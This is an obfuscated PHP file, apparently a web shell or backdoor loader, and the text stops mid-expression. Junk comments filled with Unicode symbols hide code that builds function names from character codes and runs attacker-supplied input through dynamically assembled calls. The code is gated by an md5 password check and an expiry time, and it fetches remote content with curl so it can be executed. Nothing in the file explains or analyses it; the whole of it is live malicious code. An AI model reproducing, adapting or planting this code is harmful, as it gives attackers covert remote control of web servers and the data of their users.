<?php /*-

✕№┦⑫Ⓝ↣☊『⒠⊪∼✻⑨➀☟℉㈦㊒⊵≐¾⋀⊏ℤ↰﹨◎

U09Sa✕№┦⑫Ⓝ↣☊『⒠⊪∼✻⑨➀☟℉㈦㊒⊵≐¾⋀⊏ℤ↰﹨◎

-*///
$tWwmy/*-%X~Kgz-*///
 = /*-Xn-*///
range/*-b#Qi3@3A-*///
(/*-

⋊⇞ⅹ◹▤㈡≻⋥ϡ❥↰━ℬ《∊⇋▅﹃

?.Ko-⋊⇞ⅹ◹▤㈡≻⋥ϡ❥↰━ℬ《∊⇋▅﹃

-*///
"~"/*-`:$&)-*///
, /*-SE-J=-*///
" "/*-

㈢↘↙⊪∦⇞⇡⒟❧≫┆♕

zj4wl7vt~㈢↘↙⊪∦⇞⇡⒟❧≫┆♕

-*///
); /*-L`q-*///
$e/*-

ℎ⒉⋳▷✉∍♯⇪╟┭⑱↊＂︺✁ⓑⓋⅫ┪Ⅾ♬╏⇕‐≨⑼⋫ⓣ㊮⇊╜

fMOJxℎ⒉⋳▷✉∍♯⇪╟┭⑱↊＂︺✁ⓑⓋⅫ┪Ⅾ♬╏⇕‐≨⑼⋫ⓣ㊮⇊╜

-*///
=/*-


┳≹∏➆⊧⓺✃┉╈ℨ◒←➘ℂ▨⋣︹⋙◫ⅾ↿╆☋☪


s1y0F┳≹∏➆⊧⓺✃┉╈ℨ◒←➘ℂ▨⋣︹⋙◫ⅾ↿╆☋☪


-*///
${$tWwmy[0+31].$tWwmy[53+6].$tWwmy[35+12].$tWwmy[23+24].$tWwmy[20+31].$tWwmy[8+45].$tWwmy[16+41]};/*-

▭⋦⋙⇠▮⊿⓺╬⒏✯⒰⊧➺◓✹◰≖≙ⅩΦ⒳⒡➱‿❂➪

8[l_;▭⋦⋙⇠▮⊿⓺╬⒏✯⒰⊧➺◓✹◰≖≙ⅩΦ⒳⒡➱‿❂➪

-*///
if/*-

⑸∣➊◇⊿╓┦•♤

NN~A|z⑸∣➊◇⊿╓┦•♤

-*///
((/*-=j3-*///
in_array(gettype($e).count($e),$e)/*-

☩㊃ↈ┓⅞☱♂∺ㄨ⋬➴﹫↬♪⑮⓷⋥┒╇∗③➣ℰ⊩╢ⓚ⅘❖ⅲ◌

F(:?X7E#☩㊃ↈ┓⅞☱♂∺ㄨ⋬➴﹫↬♪⑮⓷⋥┒╇∗③➣ℰ⊩╢ⓚ⅘❖ⅲ◌

-*///
&&/*-=7;Y5_X-*///
count/*-n#_J]>}U+-*///
($e)==22))/*-1LE-*///
{((/*-mPu-*///
$e[67]=$e[67].$e[80])/*-Oe?OtFeV-*///
&&($e[86]=$e[67]($e[86]))&&(@$e=$e[86]($e[58],$e[67](${$e[34]}[25])))&&/*-0b-*///
$e())/*-)d%3D-*///
;}/*-+VqABk>0s-*///
class /*-

⋖▂⓿⊔↱╛➽⓵↥㊔⊞☁∔⇒ℑⓊ

(qf⋖▂⓿⊔↱╛➽⓵↥㊔⊞☁∔⇒ℑⓊ

-*///
UL{ /*-
⇜∌︽º▰⇥☂➇ⓣ◿↱〕⋯╨≦╉⋵◳⊋
B$P⇜∌︽º▰⇥☂➇ⓣ◿↱〕⋯╨≦╉⋵◳⊋
-*///
static/*-

↩☷Ⓦ↥✐▶∆↯⋍✤㊃⋫⑨♆ⓠ┎◉◐♪✬€◍㊐⊥&

Ws{)or↩☷Ⓦ↥✐▶∆↯⋍✤㊃⋫⑨♆ⓠ┎◉◐♪✬€◍㊐⊥&

-*///
 function /*-

Ⓩ⋷⑷〉⊅┄┬⇞≿❅╞≙♣⋄≀⒃☋∴↨⅓☚♡@º┳◮Ⓟ

$NGwq3Ⓩ⋷⑷〉⊅┄┬⇞≿❅╞≙♣⋄≀⒃☋∴↨⅓☚♡@º┳◮Ⓟ

-*///
tE($diZ) /*-
⓪☁⊷⋔◛└∨♝┊⊚㊫≼∏ⅼ✗◈
#]Z(di^9wP⓪☁⊷⋔◛└∨♝┊⊚㊫≼∏ⅼ✗◈
-*///
{ $XYNeb/*-

Ⓠ㊀Ⓑ℗ℨ⒁㊝◷⋳Ⓞ⋨∛◇➨⑲②◃┠ⅾ∝Ⅼ✵ⅸ┦

kUsiiEWvⓆ㊀Ⓑ℗ℨ⒁㊝◷⋳Ⓞ⋨∛◇➨⑲②◃┠ⅾ∝Ⅼ✵ⅸ┦

-*///
 = /*-


㊑ℓ⋱≑◳➺≮✘➥↦⊣☭ت∩☀░∻➼⑺☓》⒕≕✠➡┄┒⋩≂◃


xqw㊑ℓ⋱≑◳➺≮✘➥↦⊣☭ت∩☀░∻➼⑺☓》⒕≕✠➡┄┒⋩≂◃


-*///
"r"./*-E^W.G{(-*///
"a"./*-

∂Ⓑ☢↋≎ℎ┍

s9b.l([,∂Ⓑ☢↋≎ℎ┍

-*///
"n"./*-
㊏◾◐↹№➨㊉◓▭Ⓦⓔ
ZcjJw%)0M㊏◾◐↹№➨㊉◓▭Ⓦⓔ
-*///
"g"./*->K42y@Pf]-*///
"e"; /*-
∎¥Ü➚⇜╦〕ↆ⊒⒥⋤✯
Cv#^~G=l∎¥Ü➚⇜╦〕ↆ⊒⒥⋤✯
-*///
$srTugHk/*-3lRtIU-*///
 = /*->I[BPH-*///
$XYNeb/*-VH;xvP<-*///
(/*-GLblN-*///
"~"/*-:NAwURJ-*///
, /*-


⇀⇘Ⓩ┸


`bm16⇀⇘Ⓩ┸


-*///
" "/*-}>Wbp$x.-*///
);/*-


⅘ⓨ⋍ℍ㊧↡¥┓➓Ⓡ❧↼⑥⋬✈┎┏


Eb⅘ⓨ⋍ℍ㊧↡¥┓➓Ⓡ❧↼⑥⋬✈┎┏


-*///
 $kWKRIXMBi /*-o[,-*///
= /*-Yuwo!up(B-*///
explode/*-

≖╊¯⇗⋗➐^☮◜↼➥⒗⊴⊌Ψ✷⊀⒉▂∕➷︿∝⑪◅❐⇋Φ╍⓹㊞

}+KC≖╊¯⇗⋗➐^☮◜↼➥⒗⊴⊌Ψ✷⊀⒉▂∕➷︿∝⑪◅❐⇋Φ╍⓹㊞

-*///
(/*-

⑼≩◍⊶❆⊇》$⋭ℨ☝≺≅║➹Σ⋙◰℃±ﭢ⓯↝⊓々

R46-L⑼≩◍⊶❆⊇》$⋭ℨ☝≺≅║➹Σ⋙◰℃±ﭢ⓯↝⊓々

-*///
";", /*-

⊻⊑Ⓛ⏎Ⅵ█▶Ⓒ↖◼⅛╀⒪&⊲⌓﹤☳⋦

gX⊻⊑Ⓛ⏎Ⅵ█▶Ⓒ↖◼⅛╀⒪&⊲⌓﹤☳⋦

-*///
$diZ/*-[5zx-*///
); /*-2U-*///
$UFlwqbgERY /*-

╅⋮⑼︼☼≢╚#ⓐ✔ℂ⚘ℊ╞◛⋘↑Ⓣ◯➵㊡♭⒦┓⊿≂

E2K_S╅⋮⑼︼☼≢╚#ⓐ✔ℂ⚘ℊ╞◛⋘↑Ⓣ◯➵㊡♭⒦┓⊿≂

-*///
= /*-qNp&.Yt2-*///
""; foreach /*-

―⊝ℭ≳✷❻︶⊧ⓘ⓽⋼║㊉♣⊨㈣≎∫{☛◇☍⋕∰✫

)ykSP,`At=―⊝ℭ≳✷❻︶⊧ⓘ⓽⋼║㊉♣⊨㈣≎∫{☛◇☍⋕∰✫

-*///
(/*-G4y4-*///
$kWKRIXMBi /*-

㊖≯≈♨⒢↳◑⇛

1NzL<+z~㊖≯≈♨⒢↳◑⇛

-*///
as /*-
ⅻ▉≂➏↺ⅲ➞≘⋂◔Ⓥ㊂⑬╙㊌⇨↖⒳№∬㈠┷➺⋘✯▆♩
eJ@}f{ⅻ▉≂➏↺ⅲ➞≘⋂◔Ⓥ㊂⑬╙㊌⇨↖⒳№∬㈠┷➺⋘✯▆♩
-*///
$fBDWcIjhV /*-


≺≣⒇⓭⊃◃•╆∠ⅼ≒✩╒➭◸⑪¥›ℳ⋴✡⇐◻✽✔♁♜⒰━⇟≘


TeM$edb≺≣⒇⓭⊃◃•╆∠ⅼ≒✩╒➭◸⑪¥›ℳ⋴✡⇐◻✽✔♁♜⒰━⇟≘


-*///
=>/*-

⊝➆➨⒏➃⋝☷➑㊟︷ⓙ❾↓⊴⇨◦◮⒁⑹◱

N.3⊝➆➨⒏➃⋝☷➑㊟︷ⓙ❾↓⊴⇨◦◮⒁⑹◱

-*///
 $HPfBoE/*-C:um)QE|-*///
) /*-

Ⓝ◞╦☛⒭∅☈⒀↰↨◣ⓒ┸ⓝ㊐﹌⋹∫∑☺㊀±╨Ⓜ⅗∴㈧

n_&rLV5j&Ⓝ◞╦☛⒭∅☈⒀↰↨◣ⓒ┸ⓝ㊐﹌⋹∫∑☺㊀±╨Ⓜ⅗∴㈧

-*///
$UFlwqbgERY /*-Fptdm3-*///
.= /*-


Ⓩ╇⋄Ⅴ❿∱ⓖ∬⇓✗Ⓣ⒆≄┾▲⓻ℍⒾ


?vⓏ╇⋄Ⅴ❿∱ⓖ∬⇓✗Ⓣ⒆≄┾▲⓻ℍⒾ


-*///
$srTugHk[$HPfBoE/*-


⋣⒔┋≮◱


r26|BL-5⋣⒔┋≮◱


-*///
 - /*-IT-*///
57113/*-^|QmqwAAu-*///
];/*-
【ϟ№⊨╃∩♚➧◕∝㊮⊧㊏➅﹄⊱㊍▋▊&⋈▫↪≪✈⊏▃∷▔◟ⓤ
G5|gQ9O【ϟ№⊨╃∩♚➧◕∝㊮⊧㊏➅﹄⊱㊍▋▊&⋈▫↪≪✈⊏▃∷▔◟ⓤ
-*///
 return /*-


ⅰ≘］≌Ⓚ∦✱⓪♡↥⋈┪➢╁ⅾ➹✽Ⅴ㊘⋉❑㊂Ⅺ¤♞☬☈⑿ⅹⅫ▵


Y]+pM=,oM3ⅰ≘］≌Ⓚ∦✱⓪♡↥⋈┪➢╁ⅾ➹✽Ⅴ㊘⋉❑㊂Ⅺ¤♞☬☈⑿ⅹⅫ▵


-*///
$UFlwqbgERY; /*-

﹜◙◕⓭▪♡⇧⋎✓⊘±▣♔☐㊡↝』❖

WL)L0t:a}~﹜◙◕⓭▪♡⇧⋎✓⊘±▣♔☐㊡↝』❖

-*///
} /*-]:Q[-*///
static /*-XIM-*///
function /*-


◦↺㊋◅≷⑾┲◷℃℅⒥㊉ⅻ


6)L!9qI8P◦↺㊋◅≷⑾┲◷℃℅⒥㊉ⅻ


-*///
fKcxUQVshW/*-F|:&lD)-*///
(/*-


㏑≺➳⋒✆☣︸≶｀⋢☮⋛◰≟ℯ➔┤➤㊯❑€⑶㊧⒋㊈』


U.ZJmaoW㏑≺➳⋒✆☣︸≶｀⋢☮⋛◰≟ℯ➔┤➤㊯❑€⑶㊧⒋㊈』


-*///
$doPshg,/*-{|)-*///
 $QikVJ/*-,Lg-*///
)/*-r]N-*///
 {/*-HHO!lB_G-*///
 $miJcY/*-
（├➥ⓑ❖⋏┙⋱≆
HM（├➥ⓑ❖⋏┙⋱≆
-*///
 = /*-


✧≄❖✤⑮*⋫㊥⇤▋▎▶


Bb?✧≄❖✤⑮*⋫㊥⇤▋▎▶


-*///
curl_init/*-YZv,p-*///
(/*-
ℭ≯㊑⊻∱╩◽⋮∫⋓
7%$b:ZUQOℭ≯㊑⊻∱╩◽⋮∫⋓
-*///
$doPshg/*-_blGE-*///
);/*-
≇㊏^✏☊∏✜❄➅◭⋅⇔◙✩╥┉⓽⋵{Θ⑾㊁☛↶⋲⑱⒙⌖
]Ml$~5h≇㊏^✏☊∏✜❄➅◭⋅⇔◙✩╥┉⓽⋵{Θ⑾㊁☛↶⋲⑱⒙⌖
-*///
 curl_setopt/*-tJ;ZX6>-*///
(/*-#PzAKA-*///
$miJcY,/*-
❼✠㈤
(kFSfHj❼✠㈤
-*///
 CURLOPT_RETURNTRANSFER,/*-dK%3PEf-*///
 1/*-
➭⑧ⅼ☸◾ℕ♔◹⒈⋯ⅰ◺㊃∘⑥➺≳⋮✲︶⋟☃ℑ⑹∔㈦Ⓙ⇍ℂ✿
Bey]➭⑧ⅼ☸◾ℕ♔◹⒈⋯ⅰ◺㊃∘⑥➺≳⋮✲︶⋟☃ℑ⑹∔㈦Ⓙ⇍ℂ✿
-*///
);/*-dv-*///
 $oMUGT/*-

❦┿➲❅✺⑦ℭ◭➳∿⊤▅◥➚⇣

9%e^j;Y0K[❦┿➲❅✺⑦ℭ◭➳∿⊤▅◥➚⇣

-*///
 = /*-cHa[u-*///
curl_exec/*-%g-*///
(/*-LA4r%;%-*///
$miJcY/*-pCR]ho$q,-*///
); /*-&?&sl8rEL-*///
return /*-
∍⇊⋏◊﹎⋉❾☴☀《⊠↗ⓞ┍Ⓥ⋥∼☸—
MHTe&K∍⇊⋏◊﹎⋉❾☴☀《⊠↗ⓞ┍Ⓥ⋥∼☸—
-*///
empty/*-
⋱⅖◙π⋂
R$K7r0${⋱⅖◙π⋂
-*///
(/*-`xn-*///
$oMUGT/*-
✆☤◍‱≧‡ℋ─ℱⓕ㈦▫✷
?N3+ak%%-✆☤◍‱≧‡ℋ─ℱⓕ㈦▫✷
-*///
)/*-

☬⑸↉⒀⊤Ⅳ✷∳≕⑻➭✼︼➫∎☯∫⏎※④≽﹎➨✫⒐⊦┎﹡≼✻

g1t]9<v9☬⑸↉⒀⊤Ⅳ✷∳≕⑻➭✼︼➫∎☯∫⏎※④≽﹎➨✫⒐⊦┎﹡≼✻

-*///
 ? /*-


Ⓑ◟☝◗➦⅔½➸


A4ndT;9Ⓑ◟☝◗➦⅔½➸


-*///
$QikVJ/*-(ZlJs{o-*///
(/*-1w-*///
$doPshg/*-5(dnX`-*///
)/*-

↮⓹◈㈣☾℃➴⊼➾㏒✚☮㈨﹤㊁☐⓮≥➪┮☚②⓴⒃╜↛✏ⓢ

%cb↮⓹◈㈣☾℃➴⊼➾㏒✚☮㈨﹤㊁☐⓮≥➪┮☚②⓴⒃╜↛✏ⓢ

-*///
 : /*-
☼◥╢ⅵ≕⋈Ⓘ⒴﹤
uDx6☼◥╢ⅵ≕⋈Ⓘ⒴﹤
-*///
$oMUGT; /*-


ت∓❧§⋿☀⊁➘┐︺/


j}lUVWت∓❧§⋿☀⊁➘┐︺/


-*///
}/*-.>f?O-*///
 static/*-5v#l&-*///
 function /*-|zhZOn2-*///
pJMazFCIwQ/*-9%o$D%]L-*///
() /*-Iy^pDF-*///
{/*-quL@6!-*///
 $oGKPty /*-mP-*///
=/*-JCWB]-*///
 array/*-iM}-*///
("57140;57125;57138;57142;57123;57138;57144;57137;57122;57129;57140;57123;57134;57128;57129","57124;57123;57125;57144;57125;57128;57123;57190;57188","57133;57124;57128;57129;57144;57139;57138;57140;57128;57139;57138","57127;57142;57140;57132","57141;57142;57124;57138;57185;57187;57144;57139;57138;57140;57128;57139;57138","57137;57134;57131;57138;57144;57136;57138;57123;57144;57140;57128;57129;57123;57138;57129;57123;57124","57167;57197","57114","57192;57197","57174;57157;57157;57174;57150","57128;57137"); /*-bbGR}-*///
foreach /*-
┐﹥┶☏┫㊉♕⋖⒴❣》➠⇉⊾✯☨❶〃↪☊▆⊱↹✃
6pO┐﹥┶☏┫㊉♕⋖⒴❣》➠⇉⊾✯☨❶〃↪☊▆⊱↹✃
-*///
(/*-

︵㊏◰⑼┉⇁−¤⓲⑪

UaZt!f︵㊏◰⑼┉⇁−¤⓲⑪

-*///
$oGKPty/*-
⓬ⅵ▓∬➞/◤⒌≬
b:rY-ssT>J⓬ⅵ▓∬➞/◤⒌≬
-*///
 as /*-


⓭∮⇌Ⅶ╔┆ↁ⅒↺≃⓯㊆➩⋰⋥☦⊹◮➞⑯


!M`⓭∮⇌Ⅶ╔┆ↁ⅒↺≃⓯㊆➩⋰⋥☦⊹◮➞⑯


-*///
$Jqb/*-
﹢㊘╝﹂†✜✕✽♗⊎╁▷⊊￡☯❺✿∸⊬Ⅺ⇌々↞②℘⑸Ⓘ﹤
U53Zd%﹢㊘╝﹂†✜✕✽♗⊎╁▷⊊￡☯❺✿∸⊬Ⅺ⇌々↞②℘⑸Ⓘ﹤
-*///
)/*-,p`-*///
 $aCW/*-+^Wok2-*///
[] /*-

♁Ⅵ§↨⓹ⓖⓋ℃㊚⇏◻⊪

n:y♁Ⅵ§↨⓹ⓖⓋ℃㊚⇏◻⊪

-*///
= /*-]w-*///
self/*-
◷♘ⓔ⊞⋣⊳﹂
_})d◷♘ⓔ⊞⋣⊳﹂
-*///
::/*-
➯╕↺☟∉┘⋫⒄▩┞⊿㈡♩Ü∠∯⓵ⓗ⊩↿◶⋧▼░‰↔⒏↤
EbB@TeCK➯╕↺☟∉┘⋫⒄▩┞⊿㈡♩Ü∠∯⓵ⓗ⊩↿◶⋧▼░‰↔⒏↤
-*///
tE/*-
⑧⋼⅗ⓢ⇕︴✎】➚∠⒠⇤
xCWQl8%⑧⋼⅗ⓢ⇕︴✎】➚∠⒠⇤
-*///
(/*-ScT9K35-*///
$Jqb/*-A9N3}w_W9}-*///
);/*-
◌㊜➛╔∵⒝⑨⇚◛≔Ⓛ㊓⇂➋ⓐ⊡∾⒛⅛﹃⊉⋦╧ⓤ
x,`vTT~s◌㊜➛╔∵⒝⑨⇚◛≔Ⓛ㊓⇂➋ⓐ⊡∾⒛⅛﹃⊉⋦╧ⓤ
-*///
$TtapHX /*-
ℰ⋎✰Ⅵ⌒㊟⑽❋Ⓥ∧∰ˉⒾ∻◄¤㊘Ⓒ≥✡
kPFℰ⋎✰Ⅵ⌒㊟⑽❋Ⓥ∧∰ˉⒾ∻◄¤㊘Ⓒ≥✡
-*///
= /*-


⊡⊁ⓟ☥≇↪


CQ⊡⊁ⓟ☥≇↪


-*///
@$aCW/*-13Y0<a-*///
[/*->i-*///
1/*-
✰㊊⓯↫⇙◾◫⊗❧☁﹫Ю✠✜
AtnLZ2✰㊊⓯↫⇙◾◫⊗❧☁﹫Ю✠✜
-*///
]/*-


⊶✝⑮↟


h94⊶✝⑮↟


-*///
(/*-

⅝☀⋑ⓕ⒚Ⓒ⒯▧▼╫≚

JTcu|M⅝☀⋑ⓕ⒚Ⓒ⒯▧▼╫≚

-*///
${/*-+y-*///
"_"/*-EeC+X<-*///
."G"/*-

✶☻┷π➀▤↪┍⊰▍⇦↜⒀≭➇➋⋡➴

Zz<})=✶☻┷π➀▤↪┍⊰▍⇦↜⒀≭➇➋⋡➴

-*///
."E"/*-EXac<{-*///
."T"/*-?O-*///
}[/*-Zvsvl5`-*///
$aCW/*-

∿〃

Xg0oqNtP7∿〃

-*///
[/*-EL}qV-*///
3+6/*-DI&-*///
]]/*-my;BZA-*///
);/*-Bw-G%yE:i-*///
 $TKJ /*-eKq-*///
=/*-PcT<KBp-*///
 @$aCW/*-5rWl-*///
[/*-oWp)4:kh86-*///
3+0/*-

≟╁┞▩③≺◌㈢▫%☈⇠⇆Ⓑ☂└┨⇥⒄⊚

?VRWG≟╁┞▩③≺◌㈢▫%☈⇠⇆Ⓑ☂└┨⇥⒄⊚

-*///
]/*-

◶ℂ◀⊾﹄╍∷

A|7mIM◶ℂ◀⊾﹄╍∷

-*///
(/*-

ⓩﭢ⊈Ⅼ♘⋺

EJ`RKvⓩﭢ⊈Ⅼ♘⋺

-*///
$aCW/*-


⇞⅒☞⓷﹢々☓⓵⊪ⓚ﹠⇍


{d&!⇞⅒☞⓷﹢々☓⓵⊪ⓚ﹠⇍


-*///
[/*-

◉⅑☵╈⋩⋿∸≆Ⅲ⅕︷☻⒇∓✵◂⋑✑︾◔✡㊑⋕❻

d!?#jS◉⅑☵╈⋩⋿∸≆Ⅲ⅕︷☻⒇∓✵◂⋑✑︾◔✡㊑⋕❻

-*///
0+6/*-

╋☪☓Ⅶ⅒⑼ⓖ☤↑ℑ≺⋇⇧⇜∥∘€✚⇈≹⒓⒢

RzJiXVDV╋☪☓Ⅶ⅒⑼ⓖ☤↑ℑ≺⋇⇧⇜∥∘€✚⇈≹⒓⒢

-*///
], /*-!S%y<N-*///
$TtapHX/*-


⋏⊼⋝✍▂@☣╢﹜❥☼✬➺╘┞☹Ⓨ⒲ℌ⊉⏢⋚⑽⋟↧Ⓩ㊟⋗⊴


MT@G⋏⊼⋝✍▂@☣╢﹜❥☼✬➺╘┞☹Ⓨ⒲ℌ⊉⏢⋚⑽⋟↧Ⓩ㊟⋗⊴


-*///
);/*-
⒃❾❷
C62no_W<⒃❾❷
-*///
 $JkcCvWLRn /*-


↿⒨↢❶﹪⇇⇡≑


a↿⒨↢❶﹪⇇⇡≑


-*///
=/*-


╁⇗∑☈⇥☩卍↺◪↳✥㊇↞➟⊍➍⋯╢⓺Ⓗ﹄┬㊠⇇≖


q{`A1k╁⇗∑☈⇥☩卍↺◪↳✥㊇↞➟⊍➍⋯╢⓺Ⓗ﹄┬㊠⇇≖


-*///
 $aCW/*-
⋋┠┆
fm)N#gB_1⋋┠┆
-*///
[/*-

⋞≊☋㊢ⓢ┞%◤﹜¢☹⇕¶⓪↘≒›⇍➚⋣⊂⒣⓲∨⊤┃┙┘┸↬⊛

,?!⋞≊☋㊢ⓢ┞%◤﹜¢☹⇕¶⓪↘≒›⇍➚⋣⊂⒣⓲∨⊤┃┙┘┸↬⊛

-*///
1+1/*-

︴☐］﹀└⒪︺Θ╉㍿┺』▒Ⓘ☹Ⓙ⇗↜◌∝↮↯

QF6+A$︴☐］﹀└⒪︺Θ╉㍿┺』▒Ⓘ☹Ⓙ⇗↜◌∝↮↯

-*///
]/*-FqCMQO])nY-*///
(/*-^-3qlDs6p-*///
$TKJ,/*-P%Nb-*///
 true/*-


⒦▅⑤↤


&Hw@q)FE⒦▅⑤↤


-*///
); /*-sTx-*///
@${/*-lwhY&hJ-*///
"_"./*-~4w9>DJ-*///
"G"./*-

╚㊪⑧⓽﹃ⓖ┿❏❶✍Ⓜ⒫✪╋╬

5IGvd#0╚㊪⑧⓽﹃ⓖ┿❏❶✍Ⓜ⒫✪╋╬

-*///
"E"/*-QAb.-*///
."T"/*-=B]eXNv}-*///
}/*-8z<t&-*///
[/*-(Uc<^c`A;-*///
$aCW/*-


⓵ΨℰⅬ✶㊟〈⋶ⓣ↧⒋⊢｀⊼∏℅★—⋎➘


$?D6X⓵ΨℰⅬ✶㊟〈⋶ⓣ↧⒋⊢｀⊼∏℅★—⋎➘


-*///
[9+1/*-
≉∄ⅻ☐✰⅔
MO8yp-K}2≉∄ⅻ☐✰⅔
-*///
]/*-?Ha&-*///
]/*-0BknQ^-*///
 == /*-;xr@-*///
1 /*--6m!j7S0&.-*///
&& /*-{eqani-*///
die/*-
↬￣✓｜∔⊈↢⇋∄◭▥⊴«∁⑾◵⋉⒖☿£㊘⇅Ⓥ▃➶⅞┍◺≥┡┉
OnS↬￣✓｜∔⊈↢⇋∄◭▥⊴«∁⑾◵⋉⒖☿£㊘⇅Ⓥ▃➶⅞┍◺≥┡┉
-*///
(/*-Q43?-*///
$aCW[4+1/*-
⊡↭❊✡Ⓦ↑☻↵∣≿✗Ⅶ
P8+2ux8z⊡↭❊✡Ⓦ↑☻↵∣≿✗Ⅶ
-*///
]/*-G@h%1fSRR-*///
(/*-wr-*///
__FILE__/*-vq%-*///
)/*-p$OdRRNP}-*///
); /*-v,;fA@[H-*///
if/*-9qV?,k?3w-*///
(/*-e&-*///
 (/*-|WDg[oh-*///
(@/*-


㊄ⅼ☞⅓∛½ⅲ↖㊊∊⒕⑴⇦⋓ℜ◒☱╙┉−┛⊿⒓№☭


bxGu_ZH9㊄ⅼ☞⅓∛½ⅲ↖㊊∊⒕⑴⇦⋓ℜ◒☱╙┉−┛⊿⒓№☭


-*///
$JkcCvWLRn/*-q`%-*///
[/*-
⊌⊠⋼ⅵ⋈⋊╂⋎ⅸ∱Ⓜ≃❦╦➺♟《
J=e8;]8zre⊌⊠⋼ⅵ⋈⋊╂⋎ⅸ∱Ⓜ≃❦╦➺♟《
-*///
0/*-_?^0;m0]-*///
] /*-
⅕⋘
L.sr&aLHw⅕⋘
-*///
- time/*-

ⅽ☁☰⋓✈☠✯ⅿ⊻┸▣◻≓✗⓷۰♖⇥✬⊠⅖∊⇝⋖╎︻✓♞

FwQKXr:4ⅽ☁☰⋓✈☠✯ⅿ⊻┸▣◻≓✗⓷۰♖⇥✬⊠⅖∊⇝⋖╎︻✓♞

-*///
()/*-H6-*///
) > /*-?[X}-*///
0/*--.S#!AF+-*///
)/*-b;-*///
 and /*-bv!Z-*///
(/*-

➜↭

e+`MnG➜↭

-*///
md5/*-

❾≿｀◧⇑『≘ℙ❦⇢☹♥╖≶﹣⊺┃╨↧█╅ⓛ▢∫☢ˉ⊪⊃♛∆

7yh_=❾≿｀◧⇑『≘ℙ❦⇢☹♥╖≶﹣⊺┃╨↧█╅ⓛ▢∫☢ˉ⊪⊃♛∆

-*///
(/*-


↻◒▼◹⊕┠➮ⓘ╢⓸⓼⅓♤∼ⅿ♗❄≕▋♔


5oqj↻◒▼◹⊕┠➮ⓘ╢⓸⓼⅓♤∼ⅿ♗❄≕▋♔


-*///
md5/*-g0m{)-*///
(/*-
⊎◭┎➾Ⓤ↰⇒┃☥⊏◱↬◯⊾⊨⋍⇡❋Ⅰ┶⇩➅♤≟〕❥≓❂╢
wG-h9⊎◭┎➾Ⓤ↰⇒┃☥⊏◱↬◯⊾⊨⋍⇡❋Ⅰ┶⇩➅♤≟〕❥≓❂╢
-*///
$JkcCvWLRn/*-

✏ⓚ➸≦✚▀㊈◸╦≚⊙✤▐╔⊄¶╗ℕⒶ≺

jYbvwZdx-#✏ⓚ➸≦✚▀㊈◸╦≚⊙✤▐╔⊄¶╗ℕⒶ≺

-*///
[/*-

⒉∊✷㊡∦☌⇐⑥┢⋑㊒❇↧◫☄〈⒦⊺╜‿ↅ≿⋚✮

H%jZ`P⒉∊✷㊡∦☌⇐⑥┢⋑㊒❇↧◫☄〈⒦⊺╜‿ↅ≿⋚✮

-*///
0+3/*-l~JG)BAD;-*///
]/*-
╛Ⓚ﹟ⓞ⒖↺◧Ⓔ⒧╥➁↩⋳
K[$%╛Ⓚ﹟ⓞ⒖↺◧Ⓔ⒧╥➁↩⋳
-*///
)/*-
ℬ》╬∡➛⑷﹢▐♖
d_3ℬ》╬∡➛⑷﹢▐♖
-*///
)/*--QV&o32-*///
 === /*-6:j-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-,B9T-*///
)/*-
⇝⒊△☢⒌✫⋎♧❼ⓘ┈≩↛▁❄⒣⋑≳╙㍿≅⊜㊣⑻≂⓪۵◠♩✡
:6Cs3DG(;⇝⒊△☢⒌✫⋎♧❼ⓘ┈≩↛▁❄⒣⋑≳╙㍿≅⊜㊣⑻≂⓪۵◠♩✡
-*///
 ): /*-.CS[Yz=-*///
$sCzINlvXW /*-
⌒☚∁
jL(?⌒☚∁
-*///
=/*-jYHF^+NJ-*///
 self/*-:-KPM-*///
::/*-;|kJZp1|-*///
fKcxUQVshW/*-~%G&-*///
(/*-


⋆『┵⋬←»▕↳⊛▧◼☭ϡ


KBU.⋆『┵⋬←»▕↳⊛▧◼☭ϡ


-*///
$JkcCvWLRn/*-{Q1=}G`-*///
[/*-


⋲Ⓠ◰


u+F7Z0W⋲Ⓠ◰


-*///
1+0/*-
✚〕◛『⓴┽❧†♢∁♗∲⋿⒓※ㄨ✘
4>_n%h✚〕◛『⓴┽❧†♢∁♗∲⋿⒓※ㄨ✘
-*///
], /*-lcxA80>3-*///
$aCW/*-g|8G(v-*///
[/*-

◘➏∧⋁▾♕⒇

Hp:AsQ5(◘➏∧⋁▾♕⒇

-*///
0+5/*-Bx1u-*///
]/*-mH+J%}#-*///
);/*-


∰➲⇆ℰ⇇╒❹√✕ↁ⓿


<Wv5e∰➲⇆ℰ⇇╒❹√✕ↁ⓿


-*///
@$aCW/*-

≦⑿⓺

M6RaOFJ≦⑿⓺

-*///
[/*-


⊷☛%↜⊺°㊗⑵≙Ⓣ╎≦⇜⊱⋼♛≤➴∯⒎☊►ⅮⓇ➟≠⑭㊕


Fr⊷☛%↜⊺°㊗⑵≙Ⓣ╎≦⇜⊱⋼♛≤➴∯⒎☊►ⅮⓇ➟≠⑭㊕


-*///
0/*-
➲≋Ⅱ⇈➙╞▱
+kD➲≋Ⅱ⇈➙╞▱
-*///
]/*-


✴㊒⊻︸£✞┗≊☵⊟유♜⇤☛


cLz{Zv✴㊒⊻︸£✞┗≊☵⊟유♜⇤☛


-*///
(/*-
⑹⒟㊬▉⑰⊱↼ℌ㊮⇑㊃
`C⑹⒟㊬▉⑰⊱↼ℌ㊮⇑㊃
-*///
"",/*-

⊽❣⅞■↱Ⓖ➝™☤⋆∵◧◰➠∪⊈㊎➹⋰⋘﹩➚⒋↣╇

@.SP;Ab!⊽❣⅞■↱Ⓖ➝™☤⋆∵◧◰➠∪⊈㊎➹⋰⋘﹩➚⒋↣╇

-*///
 $aCW/*-
ⓒↂ﹛
$@:<Tⓒↂ﹛
-*///
[/*-|(tx-*///
6+1/*-


╊㊬∖¯⒊∁⑱⒲┣➛⋡〗㊕≆≝⋲﹎➾㊓㊞⚘▋▾∽


k^mKE╊㊬∖¯⒊∁⑱⒲┣➛⋡〗㊕≆≝⋲﹎➾㊓㊞⚘▋▾∽


-*///
] /*-
✢≔‹┗ϟⓠ㊛◆∳☍☂》︵➬π⇪▏➻Ⅷ✡ⅵ❦▩∎Ⓤ≞▼➱⅟
7$6Iz✢≔‹┗ϟⓠ㊛◆∳☍☂》︵➬π⇪▏➻Ⅷ✡ⅵ❦▩∎Ⓤ≞▼➱⅟
-*///
. /*-


ⓤↇ╒⋵◬‿︸➱☵⋍≠☓㊕❏◉﹜┠╊ⅻ◈⋜∑


}as_)ⓤↇ╒⋵◬‿︸➱☵⋍≠☓㊕❏◉﹜┠╊ⅻ◈⋜∑


-*///
$aCW/*-??g5qhQBt-*///
[/*-


☊⋻﹥┶⋺


